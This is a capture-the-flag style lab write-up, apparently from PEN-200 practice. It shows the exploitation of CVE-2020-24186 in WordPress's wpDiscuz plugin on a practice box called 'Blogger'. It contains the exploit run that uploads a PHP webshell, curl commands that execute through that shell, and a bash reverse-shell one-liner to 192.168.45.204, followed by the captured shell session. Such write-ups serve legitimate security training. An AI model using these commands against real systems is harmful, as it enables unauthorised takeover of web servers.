InfoSec LAB

Blogger_Exploitation

Created: 2 min read

Remote Code Execution

The target WordPress instance has been identified to be vulnerable to CVE-2020-24186, due to the use of a vulnerable version of the wpdiscuz plugin; 7.0.4

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/blogger]
└─$ python3 CVE-2020-24186.py -u http://blogger.pg/assets/fonts/blog -p '?p=27'
---------------------------------------------------------------
[-] Wordpress Plugin wpDiscuz 7.0.4 - Remote Code Execution
[-] File Upload Bypass Vulnerability - PHP Webshell Upload
[-] CVE: CVE-2020-24186
[-] https://github.com/hevox
--------------------------------------------------------------- 
 
[+] Response length:[60208] | code:[200]
[!] Got wmuSecurity value: 5ec4eb8f32
[!] Got wmuSecurity value: 27 
 
[+] Generating random name for Webshell...
[!] Generated webshell name: pceausvgcjcfcuq
 
[!] Trying to Upload Webshell..
[+] Upload Success... Webshell path:url":"http://blogger.pg/assets/fonts/blog/wp-content/uploads/2025/04/pceausvgcjcfcuq-1745949193.3229.php"

Executing the exploit uploads a PHP webshell to the http://blogger.pg/assets/fonts/blog/wp-content/uploads/2025/04/pceausvgcjcfcuq-1745949193.3229.php endpoint

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/blogger]
└─$ cmd=$(echo whoami | urlencode) ; curl -s http://blogger.pg/assets/fonts/blog/wp-content/uploads/2025/04/pceausvgcjcfcuq-1745949193.3229.php?cmd=$cmd
GIF689a;
 
www-data

Code execution confirmed

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/blogger]
└─$ cmd=$(echo 'bash -c "bash -i >& /dev/tcp/192.168.45.204/9999 0>&1"' | urlencode) ; curl -s http://blogger.pg/assets/fonts/blog/wp-content/uploads/2025/04/pceausvgcjcfcuq-1745949193.3229.php?cmd=$cmd

Invoking a reverse shell

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/blogger]
└─$ nnc 9999      
listening on [any] 9999 ...
connect to [192.168.45.204] from (UNKNOWN) [192.168.239.217] 35112
bash: cannot set terminal process group (1347): Inappropriate ioctl for device
bash: no job control in this shell
<ress/assets/fonts/blog/wp-content/uploads/2025/04$ whoami
www-data
<ress/assets/fonts/blog/wp-content/uploads/2025/04$ hostname
ubuntu-xenial
<ress/assets/fonts/blog/wp-content/uploads/2025/04$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
3: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:9e:46:dc brd ff:ff:ff:ff:ff:ff
    inet 192.168.239.217/24 brd 192.168.239.255 scope global ens160
       valid_lft forever preferred_lft forever
    inet6 fe80::250:56ff:fe9e:46dc/64 scope link 
       valid_lft forever preferred_lft forever

Initial Foothold established to the target system as the www-data account via exploiting

Interactive Graph View

Backlinks